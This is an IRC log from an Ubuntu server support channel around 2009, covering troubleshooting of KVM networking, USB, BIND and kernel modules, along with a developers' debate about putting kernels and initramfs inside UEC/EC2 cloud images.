<habermann24> Daviey: how do i do that??? my network configuration is bridged networking right now
<habermann24> with br0, virbr0, eth0 ... and then for each VM i get vnet0, vnet1 etc.
<habermann24> Daviey: what do you mean by using tap? what do i need to do?
<Daviey> habermann24: actually, can i point you towards a url.. one moment
<habermann24> very nice of you, thanks
<Daviey> http://www.linux-kvm.com/content/tip-how-setup-windows-guest-paravirtual-network-drivers
<habermann24> Daviey: yea i pretty much followed that guide.. using the paravirtualized drivers already
<habermann24> but strange enough...they don't give me better performance
<Daviey> habermann24: Have you tried the other nic's?
<Daviey> e1000 for example?
<habermann24> e1000 gives roughly the same performance
<habermann24> all around 9mb/sec
<Daviey> habermann24: What version of kvm are you using?
<habermann24> copying files on the machine is really fast...about 120mb/sec, so the bottleneck is definetly the network
<habermann24> Daviey: kvm-84 i think... the ubuntu 9.04 server ones
<Daviey> hmm.
<Daviey> habermann24: I'm not entirely sure tbh.. i get pretty good speeds :/
<habermann24> Daviey: what do you get? and how do you test / know
<habermann24> Daviey: and what are the hardware specs :)
<Daviey> habermann24: I assume you aren't testing the speed against stuff on the same host server?
<habermann24> im about to change the network card on that system...
<Daviey> this is reasonably good spec hw my end.
<habermann24> Daviey: does that make a difference?? well i do, but i tested it with other boxes on the network aswell
<habermann24> Daviey: i mean testing the speed against stuff on the host box...would that lead to performance loss?
<habermann24> Daviey: cause i get the same speeds with other boxes on my network
<habermann24> all around 9, 10mb/sec
<habermann24> sucks
<habermann24> My specs are AMD Quad Phenom X4, lots of RAM, lots of Disks, but...a onboard nForce gigabit card
<habermann24> about to put in a Intel 1000 PCI card, maybe that would make a difference?
<Daviey> habermann24: I've often noticed a bug in some situations where connections to the same physical server are not as good.
<Daviey> mainly with ssl/ssh connections tho.
<habermann24> would it be possible to put in another NIC ... and pass this raw device to my guest?
<habermann24> at least assign it to one of the guests
<habermann24> well, i guess it's time to put in my Intel card...maybe that helps... be right back ;)
<pluma> I'm trying to set up sendmail properly. I can log-in from localhost nicely, but it tells me it's not accepting messages if I try to log in remotely. Eh?
<pluma> Oh, nevermind. Despite what it's telling me, it accepts messages, apparently.
<joe-mac> so there are haskell and ocaml connectors for postgres, but not java?
<joe-mac> in 8.04 LTS?
<joe-mac> or am i missing something here
<ahe> joe-mac: is there no jdbc driver in /usr/share/java ?
<ahe> you can also distribute the postgres jdbc driver with your application since it's platform independent an is only one jar file
<joe-mac> ahe: no, i am trying to be a good boy and use all packages
<joe-mac> probably just serve out the jar then
<ahe> do you have libpg-java on hardy?
<ahe> as a ubuntu package
<joe-mac> ahe: gotta love consistency- every other connector is under libpostgres-
<joe-mac> thanks dude
<Vog> Hello all anyone had problems plugging in a usb device and not having it detected (external USB drive). If I restart the server it will detect it but not if I remove it and plug it back in. Same goes for keyboards.
<Hypnoz> can try running "lsusb" from the command line and see if your device is in there
<Hypnoz> maybe there is some info in one of the log files in /var/log/ ...
<Hypnoz> not sure which it would go in, maybe messages or dmesg or syslog
<Hypnoz> are you having this issue with all usb devices?
<elijahwright1> Vog, are you sure that the right modules are installed to get USB support on that machine?  You might poke around and check, manually (look in /proc/modules, look for relevant modules) to make sure the chipset support modules are there.  Does anything USB work on the machine?  Could be that the machine's keyboard (usb) works @ reboot because the bios is doing something funny to support the HID device...
<Hypnoz> ya if you "ls -l /dev | grep usb" you should see a bunch of usb devices listed
<Vog> Yes will all usb devices if I unplug them.
<Vog> IF I boot when they are installed then it is fine..
<Vog> lsusb comes up with the externalhd showing up ad a usb hub for some reason
<Vog> it does have exvra ports on it.
<giovani> Vog: well if it has extra usb ports on it, then it has a usb hub inside
<Vog> But I do not see the hd itself listed explicitly
<giovani> can you pastebin the lsusb output in that situation?
<Vog> yes.... I think I just fixed it.
<Vog> mount
<Vog> Ok by by running either lsusb or  ls -l /dev | grep usb that nudged the system into querying the usb bus and it detected the usb deviced after that
<giovani> hmm
<giovani> that seems unlikely, but ok
<XiXaQ> I've made a prototype for my virtual machines. Now, I want to clone that prototype to reuse it. That means I need to change hostnames and domains, admin users, etc, for all installed packages. Will it be safe to use dpkg-reconfigure -a and go through the steps, or should I do it another way?
<Vog> this is what appeared in syslog once I ran those 2 commands http://pastebin.com/d3467333a
<Vog> giovani: I agree unlikely but the time stamp confirms it. The device has been plugged into the system for over 30 minutes.
<Vog> http://pastebin.com/d2ba3f08a
<Vog> http://pastebin.com/d6fcf72f2
<Vog> those are the output with the time stamps of the lsusb and ls -l /dev | grep usb
<zul> smoser: around?
<garnold> hello, using image "8.10 (Intrepid) x86" on Amazon EC2... i have a user data script which runs successfully up to a point where i "sudo su - ubuntu" and attempt to execute a series of commands as the ubuntu users
<garnold> none of those commands seem to run
<garnold> running the same set of commands after ssh'ing to the machine works fine
#ubuntu-server 2009-09-24
<Kingtiger01> Hello Everyone
<Kingtiger01> Hello, anyone around?
<twb> !anyone > Kingtiger01
<ubottu> Kingtiger01, please see my private message
<Kingtiger01> i have a question regarding Clusters...
<Kingtiger01> just wondering if anyone has any articles in how to setup a cluster on *nix like OS for load balancing...
<twb> load balancing of what?
<twb> http://en.wikipedia.org/wiki/Load_balancing_(computing) cites both textbooks and external articles.  I can't vouch for any myself.
<Kingtiger01> im locally hosting mysql/apache/XMPP. but individual services are starting to eat up enough cycles to overload I/O...
<Kingtiger01> either can i, im new to clusters, im just starting to try and research about Beauwulf style clusters at the moment, trying to get ideas to alleviate some of this...
<twb> It's spelt "beowulf".
<Kingtiger01> i know... simple spelling error.
<thorsten11> hello all
<twb> Have you considered profiling your services to see if there are simple optimizations which will obviate the need for a load-balancing cluster?
<Kingtiger01> To be honest, No. But, i will now considering it is a immediate step.
<Kingtiger01> ill be back later...
<artillerytx> every time i restart bind it tells me * the remote server is using an older version of the command protocol ...
<artillerytx> not sure how to fix that
<_ruben> im guessing your rndc and named executable are from different versions
<artillerytx> ahh
<artillerytx> so i need to regenerate a rdnc key
<artillerytx> and paste it where it says
<artillerytx> Its just #rndc-confgen
<artillerytx> right
<_ruben> the key isnt the problem, the executable is, or your time(zone) stuff is wrong, though that'd only matter when using rndc from a remote box
<artillerytx> oh
<_ruben> (judging from my experience that is, could be something else in your else)
<_ruben> s/else/case/
<artillerytx> well the only way i access the computer is with ssh on another computer
<artillerytx> on the same network
<_ruben> which versions do "named -v" and "rndc -v" report?
<artillerytx> bind  9.5.1-P2
<artillerytx> rndc 9.5.1-P2
<_ruben> odd
<artillerytx> well let me give you the full error i get when i do a "/etc/init.d/bind9 restart
<artillerytx> http://pastebin.com/daf403d4
<_ruben> the logs might show more (probably /var/log/daemon.log)
<artillerytx> what am i looking for exactly
<_ruben> ah, seems list of possible errors is slightly longer than what i've seen myself .. key and acl i hadnt thought of myself
<_ruben> anything mentioned by "named" at the time of your attempted restart
<twb> Is rndc a BIND-specific utility, or does it work with arbitrary DNS services?
<_ruben> twb: its part of bind, so i'd assume the first
<_ruben> as it uses a special secure control channel
<_ruben> (re)running rndc-confgen -a might do the trick in this case, or double-check your bind config's settings for the control channel
<artillerytx> i see a /etc/bind/named.conf couldn't add command channel 127.0.0.1:953 address in use
<_ruben> sounds like an old named process is still lingering around
<_ruben> sudo killall named might do the trick (optionally with -9)
<_ruben> gotta drop off car at the garage, be back in an hour or 2
<artillerytx> k
<artillerytx> do i add a 9
<artillerytx> ?
<artillerytx> ahh now i get rndc:connect failed: 127.0.0.1#953: connection refused
<LeChacal> hello, can someone tell me how to change the order in which modules are load? Or some way that I can get one module to load before another?
<soren> LeChacal: Why?
<LeChacal> i have a special mouse driver that i need to load before the usbhid module, and I need the usbhid module for my usb keyboard, and i think my APC UPS because installing the UPS started all the problems with my mouse not working. I am told by the mouse driver maker that usbhid takes over the mouse if it is loaded before the special driver. Before I got the UPS i would just unload both modules then load in the special mouse driver 
<LeChacal> and before you ask this isnt a server but i have been trying to find an answer for a while and no one has even tried to help me yet anywhere else.
<ttx> soren: hey -- feeling better ?
<LeChacal> i have searched google and found an old forum post saying that you can't change the order because udev randomize them at boot, but this was a post about 6.06
<soren> ttx: Much.
<ttx> soren: good :)
<ttx> soren: I took the liberty to upload a new eucalyptus release so that my two fixes-of-the-day would make it in karmic before BetaFreeze.
<soren> LeChacal: udev has never randomised anything.
<ttx> opefully I did it correctly and didn't break anything
<ttx> +h
<soren> ttx: I can check?
<ttx> soren: you can check what ? That I didn't break anything ? Sure :)
<LeChacal> soren: this is what i found http://ubuntuforums.org/showthread.php?t=304491
<soren> LeChacal: I don't see the string "random" on there anywhere.
<LeChacal> soren: last post and he says shuffling
<LeChacal> soren: he does give a solution about block udev, but not fully knowing what udev does i didnt want to start playing with that
<soren> LeChacal: Try this:
<soren> LeChacal: Create a new file in /etc/modprobe.d/ (name whatever.conf)
<soren> LeChacal: Add a single line to it:
<soren> install usbhid /sbin/modprobe nameofyourspecialdriver ; /sbin/modprobe --ignore-install usbhid
<soren> That ought to do it.
<LeChacal> question, the first part "install" what is that doing if you dont mind me asking i understand the rest?
<soren> Look at man 5 modprobe.conf
<LeChacal> ok that makes since thank you, ill try that
<soren> ttx: WEll, I could check that you did things correctly.
<soren> ttx: ...and I think you did.
<ttx> \o/
<soren> So that's a good start.
 * soren takes a short break
<LeChacal> soren: thank you that worked perfectly
<artillerytx> how does dreamhost have its server set up so that whenever you install a cms and it emails someone it has whatever email you gave the cms ...
<artillerytx> I have my server running through gmail and it sends from only one account it seems
<kinnaz> is there something like openbsds security script for ubuntu, what send the /etc/ file diffs to mail daily
<johe> good morning
<RoyK> good moaning
<uvirtbot> New bug: #434593 in eucalyptus (main) "Autoregister runs euca_conf with "localhost" but that is refused in 1.6~bzr808" [Medium,Triaged] https://launchpad.net/bugs/434593
<gamla_kossan> I'd liek to do a dist-upgrade, but.. how do I know what the next version will be then?
<gamla_kossan> I'm thinking it's a little risky jumping from 7 to 9 directly
<gamla_kossan> anyone have any htoughts on this?
<_ruben> gamla_kossan: when upgrading you shouldnt skip versions (single exceptin: lts -> lts upgrades are supported)
<_ruben> and upgrading using dist-upgrade isnt recommended either
<_ruben> there's upgrade docs on the site
<soren> gamla_kossan: What do you mean by 7 and 9?
<kinnaz> do-release-upgrade is your friend :)
<kinnaz> soloslinger,  7.x to 9x
<kinnaz> soloslinger,  7.x to 9.x i bet
<kinnaz> soren even
<soren> 7.x and 9.x are both nonsense.
<soren> 7.04 and 7.10 are vastly different releases, as are 9.04 and 9.10.
<soren> I'm having a problem with quagga (ospf). :(
<kinnaz> nonsense ?
<soren> I've got two routers in my house (well, three really, but the last one is outside my control), and a machine that runs most of my virtual machines.
<soren> kinnaz: Yes.
<soren> kinnaz: I just explained it.
<soren> 09:27:15 < soren> 7.04 and 7.10 are vastly different releases, as are 9.04 and 9.10.
<soren> It makes no sense to speak of 7.x.
<soren> Nor 9.x.
<kinnaz> if you say so, for me it seems no nonsense
<soren> So, I've set up quagga to speak ospf on the two routers and the host running the virtual machines.
<kinnaz> i think you will have better luck with ospf in #networking
<soren> Hmm... Possibly.
<uvirtbot> New bug: #435776 in openldap (main) "installing ldap crashes for no apparent reason" [Undecided,New] https://launchpad.net/bugs/435776
<_ruben> quagga is somewhere down on my (way too large) todo list to investigate
<kinnaz> for me the list says dynamic routing protocols in general
<_ruben> kinnaz: kinda the same here, but with quagga in particular in mind :)
<kinnaz> i have some hardware to play around for starters
<_ruben> my hardware would be a set of vms most likely
<soren> _ruben: It was too for me yesterday. Now it's on the list of stuff I use :)
<_ruben> soren: hehe
<\sh> ugh ospf...
<uvirtbot> New bug: #430163 in eucalyptus (main) "Cloud/Walrus/SC init script confusing" [Medium,Triaged] https://launchpad.net/bugs/430163
<maxagaz> how to know which video driver i'm using
<maxagaz> it's not in xorg.conf
<_ruben> -server doesnt tend to use xorg at all
 * soren goes to lunch
<gamla_kossan> soren: fair enough, from 7.04 to 9.04 then =)
<gamla_kossan> kinnaz: thanks
<_ruben> step by step .. 7.04 -> 7.10 -> 8.04 -> 8.10 -> 9.04 .. using do-release-upgrade for each step (assuming that it already existed back then)
<uvirtbot> New bug: #359177 in mysql-dfsg-5.0 (main) "Strange or obsolete code in mysql initscript" [Low,Confirmed] https://launchpad.net/bugs/359177
<soren> Whoo!
 * soren finally got quagga/ospf working.
<soren> Now I can access my virtual machines from anywhere in the house.
<soren> Man... The pain!
<zul> morning
<smoser> soren, can you take a look at https://bugs.launchpad.net/ubuntu/+source/vm-builder/+bug/429106
<uvirtbot> Launchpad bug 429106 in vm-builder "kernel and initramfs should be available for uec" [Medium,In progress]
<smoser> and comment on file naming and such for kernels ?
<smoser> soren, and just an fyi, i turned your crontab entries off on nectarine. now vmbuilder is doing the builds.
<soren> smoser: Why wouldn't the kernel build be spitting those out?
<smoser> splitting what out?
<smoser> oh. it is spitting them out
<soren> spitting. Not splitting.
<soren> kernels and ramdisk.
<smoser> well, kernel doesn't spit out ramdisk, but install does. the changes just collect them from the image
<soren> What would VMbuilder be doing to them, then?
<soren> I don't think this belongs in VMBuilder at all.
<smoser> at the moment, vmbuilder doesn't do anything.
<soren> Nor the automated build scripts.
<smoser> well, we need to provide some way for people to easily get a kernel and an initramfs for uec images they've built
<smoser> and saying "take it from /boot" is not sufficient in my opinion
<soren> That's fair enough.
<smoser> second, vmbuilder really *should* be involved, at very least with xen it should give the user a kernel and initrd to use.
<soren> Eh?
<smoser> (and should update the xen.conf and such)
<soren> Are you talking about Xen or EC2?
<smoser> there, i meant xen.
<soren> Ok.
<soren> Well, that may be reasonable. I've ask dozens of people how to do it (I don't use Xen myself), but noone could give me a straight answer.
<smoser> i will agree that ec2 is less important to have the kernel/initramdisk outside the image
<smoser> it is also true for the kvm case that it would be useful to offer the option to pull kernels from the image
<smoser> so that the user can boot with -kernel / -initrd and -append as opposed to grub
<soren> Why, oh why, would anyone want to do that?
<soren> Mind you, it's called VMBuilder, not VMDisassembler.
<soren> :p
<smoser> hm... i dont know, maybe they're following instructions you wrote ? https://wiki.ubuntu.com/UEC/Images/Testing
<smoser> :)
<soren> Ok, I'm clearly confused.
<soren> You talk about extracting stuff from an image.
<soren> kernel and ramdisk, I presume.
<smoser> yes.
<soren> Yet, the stuff I speak of on https://wiki.ubuntu.com/UEC/Images/Testing has neither in the images.
<soren> So what exactly do you mean?
<smoser> well, now the uec images do have a kernel/initrd in them.
<soren> they... do?
<soren> How did that happen?
<smoser> yes. they have 2. linux-ec2 and linux-virtual
<soren> But, but..
<smoser> they need modules in them. modules are provided by kernel packages.
<soren> Why would you stick a kernel and a ramdisk in there?
<soren> Yes, and grub is our bootloader.
<soren> Except on EC2 where everything is conveniently different.
 * soren makes quotations marks in the air
<smoser> i dont think its conveniently different enough to not use the existing kernel packaging.
<smoser> we need modules. modules come in kernel packages. kernel packages are built for each kernel basically the same way.
<smoser> the uec/ec2 images need kernel modules and for both ec2 (xen) and kvm (uec)
<soren> Another reason why this really, really, really should not be preinstalled, but handled at boot time.
<soren> Let me ask this way: Is this a temporary solution because we didn't have time to do it better for Karmic or is this The Plan[tm]?
<smoser> i really dont know why it wouldn't be the plan.
<soren> I can think if quite a few reasons:
<smoser> if you were building an appliance to run on a full virtualization solution, it would absolutely be "the rigth way"
<smoser> so, the only difference here is that the kernel and initrd are needed outside the image.
<soren> If you're running on UEC, you have a huge stack of modules and stuff that you will never ever need taking up space.
<soren> If you're running on EC2, you have a huge stack of modules and stuff that you will never ever need taking up space.
<smoser> huge stack ~ = 20M
<soren> 20?
<soren> Package: linux-image-2.6.31-10-virtual
<soren> Installed-Size: 32068
<soren> Package: linux-image-2.6.31-300-ec2
<soren> Installed-Size: 70388
<soren> So that's 50% and 350% more than 20.
<smoser> :)
<soren> Respectively.
<smoser> -ec2 will be trimmed
<smoser> to basically be -virtual
<smoser> so < 50
<smoser> in your 10G root fs
<smoser> err...
<smoser> i obviosly have issues with math
<smoser> each one wastes 302068
<smoser> gar
<smoser> so, ec2 will "waste" -virtual installation. 32M
<zul> imho ideally for ec2 you just want a package that does the modules and no other kernel bits (except for maybe the config and the System.map)
<smoser> and uec will "waste" the -ec2 installation. 32M
<soren> Sorry, phone call.
<smoser> zul, so, there, the "waste" that the current package has is the size of the kernel. 6M
<smoser> its not perfect. i will completely agree to it being wasteful of < 40M for each case.
<smoser> i think its a reasonable tradeoff to make user space work like the rest of ubuntu
<smoser> ie, if you want to build a kernel module for your kernel, you can build one just like any other install
<smoser> zul, and in your "just modules" package, we still need to somehow create and extract a kernel to upload to ec2.
<soren> smoser: What's the plan for kernel upgrades=
<soren> ?
<smoser> i dont think this affects that at all.
<soren> Uh...
<soren> sure it does.
<soren> You boot with another kernel, and boom, you have no modules for it.
<soren> (and *two* useless sets of modules and kernels and stuff)
<smoser> why/how were you booting with another kernel ?
<soren> Because the new one had a secret backdoor in it that zul put ther.e
<smoser> and not picking a new ami that was released with that new kernel and initrd
<soren> Err.. The old one had.
<soren> Because I rebundled, perhaps?
<smoser> you can still boot with the new kernel and initrd. they're sufficient to mount root and start init, and then apt-get update && apt-get install linux-ec2
<smoser> poof. modules.
<zul> soren: if you mean by the xen patch then yes its been bacdoored ;)
<smoser> i must have missed the backdoor in the 531,893 lines of patches :)
<soren> Of course it has. It's a 20MB patch. It's the perfect plan. Noone is going to read through that.
<soren> smoser: I'm very sorry, but I think this is the worst possible solution.
<soren> I realise it works.
<smoser> :). i can think of worse ones.
<soren> Oh, sure, so can I, but of the ones that were actually seriously proposed..
<smoser> why do you think its so bad? it works much more like everything else than any othe rsolution
<smoser> consistency is extremely nice for all sorts of reasons.
<soren> That really depends on your perspective.
<soren> If you care more about the boot process being identical, then yes, this is more similar to everywhere else.
<soren> If you care more the final system  being identical, then it's dissimilar.
<smoser> i dont follow that.
<smoser> the final system is much more similar. you can ask dpkg about "where did this module come from" or apt-get install -headers
<soren> If we were to go the route of the initramfs hook that would copy the modules into the root filesystem, the user would end up with a system that is virtually indistinguishable from a regular one.
<smoser> the user now has a system that is virtually indistinguisable from a regular one
<soren> He can look at his uname info, know that he can find the appropriate modules in /lib/modules (and nothing else)..
<smoser> and happens to use all sorts of common tools to get there.
<soren> How they landed there are an implementation detail.
<smoser> ok, so pretend for a moment, that i dont care that i have a bunch of files in /lib that were not installed by the package manager
<soren> Good point about package management.
<smoser> what benefits are provided ?
<soren> In that case you could have done the apt-get trick on boot.
<alonswartz> Hey guys. With reference to MySQL InnoDB, I have come across the issue "ib_logfile0 is of different size". All forum posts seem to recommend deleting the logfiles once the mysql service has been shutdown as the logfiles will be recreated. The problem is that this issue keeps on repeating itself so I was wondering what could be the cause, and how safe is it to constantly remove the logfiles...
<alonswartz> ...prior to mysql start?
<soren> smoser: By what, sorry?
<smoser> the only benefit i see to the additional work is that you can flip flop kernels and initrds around with wreckless abandon.  kernel/ramdisk and root are more detached from one another.
<smoser> but, as i pointed out, that is quite easy with the other route
<smoser> the only negative i see in what i have right now is 32M of wasted space
<smoser> (and i will bring it up just to be fair... apt-get update && apt-get dist-upgrade inside the image is going to pull new kernels and waste network traffic)
<soren> I think the ability to replace the kernel is hugely important.
<smoser> you can do that.
<smoser> didn't i point that out ?
<soren> Yes, you /can/. It's just more of a hassle than it ought to be.
<smoser> its no more a hassle than it is on any other linux distribution that i've ever dealt with
<smoser> :)
<soren> This is one thing we actually had the opportunity to make /better/.
<smoser> i dont think so. i think we have the opportunity to make different. i dont really understand how its better ?
<smoser> what use case is it better for ?
<soren> Security problem in the kernel => Boot with a different one, and you're done.
<smoser> the strongest argument i can think of is that it makes non-ubuntu distributions more easily able to use ubuntu kernels and initramfs because they dont have to use alien
<smoser> soren, security problem in the kernel, boot with a different one and your done.... versus "boot with a different on and run 'apt-get install linux-ec2'"
<gamla_kossan> _ruben: cheers!
<smoser> which could easily be done from ec2-init
<smoser> if it detected it was running a kernel that did not have modules installed
<gamla_kossan> _ruben: yey! it does!
<gamla_kossan> ^_^
<uvirtbot> gamla_kossan: Error: "_^" is not a valid command.
<smoser> for the record, i did not believe that i was being at all subversive in doing this. i thought that you(soren) were aware.
<soren> smoser: That would make me somewhat happier.
<smoser> it would probably make pitti less happy
<_ruben> gamla_kossan: you managed to upgrade all the way?
<soren> smoser: Hm? Why?
<gamla_kossan> _ruben: oh nono, I haven't touched that part yet
<gamla_kossan> need to do some serious dd-ing of the hd in question
<_ruben> ah
<gamla_kossan> it's  a vital piece of infrastructure, the box I'mma do it on
<smoser> the ec2-init MIR. he doesn't like that we do non-standard things (or allow for them to be done) in ec2-init.
<gamla_kossan> but at least do-release-upgrade is on it =)
<smoser> i would welcome your comments and help there. i think i've failed to do a good job of explaining the need for ec2-init.
<smoser> bug 434963
<uvirtbot> Launchpad bug 434963 in compiz "Compiz no longer resizes windows properly as before, since version 0.8.2-0ubuntu16 (Karmic)" [Low,Confirmed] https://launchpad.net/bugs/434963
<smoser> hmm.. that doesn't look right
<smoser> bug 434693
<uvirtbot> Launchpad bug 434693 in ec2-init "[MIR] ec2-init" [High,Incomplete] https://launchpad.net/bugs/434693
<smoser> thats better.
<soren> smoser: Wow, yeah, pitti is annoyed.
<soren> smoser: ...and really doesn't get it, apparantly.
<smoser> yeah, i tihnk i failed to describe what its used for
<smoser> i just hit 'send' on a reply.
<smoser> i initially wrote him off-bug, because i was afraid of long winded confusing bug
<smoser> but apparently that was unavoidable
<smoser> apparently launchpad wraps lines at less than 74 chars
<soren> Hopefully at 72.
<soren> Anything other than that would be silly.
<smoser> funny. i always thought that 74 was the correct number. it seems we're argumentative today. hope you're not still feeling ill
<soren> I wasn't.
<soren> Now I am.
<smoser> and regarding launchpad, if i shrink the font, it doesn't wrap
<soren> Oh, you're right. Yes, that's much more pleasing to read.
<smoser> that seems reasonable (not wrapping when i shrink) except for that there is like 2 inches of whitespace inside the comment box to the  right
<smoser> ie, the comment box wasn't forcing the wrapping
<smoser> soren, you want to confirm bug 435905
<uvirtbot> Launchpad bug 435905 in launchpad "text comments are wrapped poorly, making them hard to read confusing" [Undecided,New] https://launchpad.net/bugs/435905
<smoser> as i think you're seeing it too
<soren> odne
<soren> done, even.
<smoser> soren, so what do i need to do to make you karmic-happy regarding kernel and initrd.  note, that we need to have a solution for this.
<soren> smoser: A promise that you will never blame me for any ot.
<soren> of it.
 * soren wonders about the accuracy of this keyboard.
<gamla_kossan> I must say, this channel is very very nice. esp when compared to #ubuntu. that channel is no fun at all :/
<gamla_kossan> =)
<soren> It can be a bit... much.
<zul> soren: we cant promise it ;)
<smoser> i really try to avoid making promises about my future behavior
<smoser> but I guess I can just deny making the promise later, so, sure.
<soren> Great. Then do whatever you want.
<uvirtbot> New bug: #386430 in eucalyptus "block storage should check if there are existing exported device on the network" [Undecided,Fix committed] https://launchpad.net/bugs/386430
<uvirtbot> New bug: #280170 in mailman (main) "Switchboard.py", line 159, in dequeue: "qrunner(822): ImportError :  No module named header"" [Undecided,Fix released] https://launchpad.net/bugs/280170
<uvirtbot> New bug: #357895 in eucalyptus/1.5 "add fallback to send mail from "localhost"" [Medium,Fix committed] https://launchpad.net/bugs/357895
<uvirtbot> New bug: #359701 in eucalyptus "volume path does not get updated through admin interface" [High,Fix committed] https://launchpad.net/bugs/359701
<uvirtbot> New bug: #360636 in eucalyptus/1.5 "Decryption tries forever" [Medium,Fix committed] https://launchpad.net/bugs/360636
<uvirtbot> New bug: #364404 in eucalyptus/1.5 "ETag should contain quotes" [Medium,Fix committed] https://launchpad.net/bugs/364404
<uvirtbot> New bug: #364424 in eucalyptus/1.5 "An arbitrary number of "/"s in front of the bucket name will cause the request to be rejected" [Medium,Fix committed] https://launchpad.net/bugs/364424
<uvirtbot> New bug: #365247 in eucalyptus/1.5 "During caching, need to keep trying until enough images are flushed" [Medium,Fix committed] https://launchpad.net/bugs/365247
<uvirtbot> New bug: #368278 in eucalyptus/1.5 "walrus: subresource string not being matched correctly" [Medium,Fix committed] https://launchpad.net/bugs/368278
<uvirtbot> New bug: #368975 in eucalyptus/1.5 "Unhelpful message if volume size limit is exceeded" [Medium,Fix committed] https://launchpad.net/bugs/368975
<uvirtbot> New bug: #371978 in eucalyptus/1.5 "A malformed PUT might starve connections" [Medium,Fix committed] https://launchpad.net/bugs/371978
<uvirtbot> New bug: #375093 in eucalyptus "DescribesVolumes (via REST) does not show status in the attachmentSet" [Medium,Fix committed] https://launchpad.net/bugs/375093
<uvirtbot> New bug: #375105 in eucalyptus "Detach volume via REST does not work" [High,Fix committed] https://launchpad.net/bugs/375105
<uvirtbot> New bug: #382522 in eucalyptus/1.5 "Consider increasing default disk size for m1.small" [High,Fix committed] https://launchpad.net/bugs/382522
<aubre> ladies and gentlemen, after applying the last karmic alpha 6 patches, I am now running instances in my local cloud
<smoser> soren, just to be clear above, i do give your rights to say "i told you so".
<smoser> aubre, awesome
<aubre> I can't ssh into them yet, but I am running them hehe
<aubre> smoser: thanks
<aubre> I use my private key, but it still wants a password for user ubuntu
<soren> smoser: And I have permission to gorge your eye out with a rusty spoon in response.
<smoser> in response to your saying "i told you so" ? i dont think that makes sense.
<aubre> I do however feel like I just hit 88 mph in a specially customized DeLorean
<smoser> and i am fairly attached to my eyes
<soren> smoser: Oh. I completely misread :)
<aubre> we need him to have his eyes because it makes reviewing code much easier
<soren> smoser: I thought you were suggesting that /you/ had the right to say "I told you so". :)
<smoser> well no, not until we decide my idea was bad, and we try your idea, and its bad too
<smoser> *then* i get to say i told you so
<soren> smoser: We'll see :)
<soren> aubre: The fun doesn't start until eighty-eight *point eight* mph. You should give it a go. :)
<aubre> soren: well do
<smoser> thats funny. i missed the reference until just now.
<smoser> 1.21Gw
<aubre> soren : will do.
<aubre> I think I won't be going back from this future :)
<aubre> thanks to everyone for the help to get to this point, and thanks in advance for the help you'll be giving me to get it into production lol
<smoser> shoot. what a pita.
<smoser> i just realized that we can't check for the metadata service to decide whether or not ec2-init should do anything
<smoser> because we might be on ec2 and the metadata service just not there yet
<smoser> soren, so, you want to list things you thought we could check for ? i know you suggested certain /proc/cmdline contents (splash, root=UUID...)
<smoser> anything else?
<kinnaz> soren, got your ospf working ?
<smoser> <not-serious> in other news, i'd like to suggest to the euca2ools people that they make it work slower.  each time i run euca-describe-instances pointed at ec2 and it comes back in < 4 seconds, i dont trust it worked.</not-serious>
<smoser> I'm too used to ec2-describe-instances taking some time to accomplish such tasks
<soren> kinnaz: I did.
<kinnaz> soren,  problem was in that bridge ? or wifi ?
<aubre> I do have to say that the instance went from pending to running in a very fast amount of time
<soren> kinnaz: Some kind of multicast weirdness with my wifi setup, yes.
<huats> soren: hey :)
<huats> how are you ?
<soren> huats: I'm on a call right now :)
<huats> ok
<huats> sorry :)
<huats> I'll come back to bother you later :)
<aubre> I just got in :)
<aubre> on the Eucalyptus supplied image you go in as user root
<aubre> ssh -i /home/clouduser/.euca/mykey root@hostname
<smoser> soren, suggestions for "is this not running in ec2" ?
<soren> smoser: Sorry, on a call at the moment.
<smoser> take your time
<metalf8801> Hi I need to set up a NAS (Network-attached storage) at my apartment to back up my computers (laptop, Desktop, olpc netbook) I'm wondering if it would be a good idea to use Ubuntu server to do this or if I should use something like FreeNAS?  I've set up Ubuntu Lamp servers before so I have a little experience using Ubuntu Server but I've never used any kind of a NAS
<jmarsden> metalf8801: I'd expect a Ubuntu server solution to be somewhat more flexible than FreeNAS, but perhaps a bit more work to configure.  If you are already familiar with Ubuntu Server, and you don't mind configuring it using the command line, I'd say use it :)
<MagicFab> metalf8801, Ubuntu server will propose a "Samba File server" task at install time, so it's trivial and fast to set that up.
<MagicFab> or sudo apt-get install samba-server^ (yes, with "^") if your server is already up.
<metalf8801> oh ok so I don't need to add anything to Ubuntu server after I install Samba file server?
<MagicFab> no out-of-the-box nice web UI however
<MagicFab> you can install E-Box (package name: ebox) and manage some of it, see http://trac.ebox-platform.com/
<MagicFab> Not sure what version of eBox we have in  Ubuntu though
<MagicFab> I'd try it on a virtual machine first if I were you
<metalf8801> yeah I will try it on Virtualbox first
<metalf8801> Um but what is E-Box?
<MagicFab> "<MagicFab> you can install E-Box (package name: ebox) and manage some of it, see http://trac.ebox-platform.com/"
<Pici> !ebox
<ubottu> ebox is a web-based GUI interface for administering a server. It is designed to work with Ubuntu/Debian style configuration management. See https://help.ubuntu.com/community/eBox
<metalf8801> oh ok I've used webmin before does ebox have advantages over webmin?
<jmarsden> metalf8801: ebox is officialy Ubuntu-compatible, webmin is not.  That's a pretty serious advantage.
<jmarsden> Note the "It is designed to work with Ubuntu/Debian style configuration management." in the above factoid from ubottu
<soren> smoser: I have some code that can determine wheter you're running in a VM.
<soren> smoser: I can dig that out for you this evening or tomorrow morning.
<metalf8801> ok I'll make a point of trying e-box thanks
<smoser> soren, you have a vague description of how ?
<giovani> soren: what method are you using to determine that? -- there are many
<soren> giovani: For KVM, there's a CPUID leaf that reveals it.
<giovani> ok, so it's KVM-specific
<smoser> soren, http://paste.ubuntu.com/277210/ is what i have
<soren> For Xen... I don't remember what it does. I seem to remember it's more than just looking for /proc/xen, but that would probably be sufficient as well.
<smoser> and we need nmore then just knowing if we're in a vm
<smoser> presense of /proc/xen would not indicate yes or no for "is this ec2"
<soren> ...
<soren> I know.
<soren> You don't need to tell me that.
<smoser> ok. well take a look at that pb url
<soren> As I've said /many/ times, I'm looking for tells that we're /NOT/ on EC2 or UEC.
<smoser> right.
<soren> Not being in a VM is a pretty good indication that you're not in either of those.
<smoser> so i suppose if we're "not in a vm" then you could sy "this is not ec2"
<smoser> but i'm hesitant on that, because really in a full virt situaltion (uec) you shouldn't necissarily know that
<soren> Sure you do.
<soren> As I just said...
<soren> 16:11:03 < soren> giovani: For KVM, there's a CPUID leaf that reveals it.
<smoser> you're saying that in the current implementation of kvm, a guest kernel can figure out if its in a vm or not.
<smoser> i'm saying that, to me, that isn't something that should be relied upon, as it may at some point be a feature of kvm to *not* indicate such things to guests
<soren> Well, Amazon may also start using real hardware.
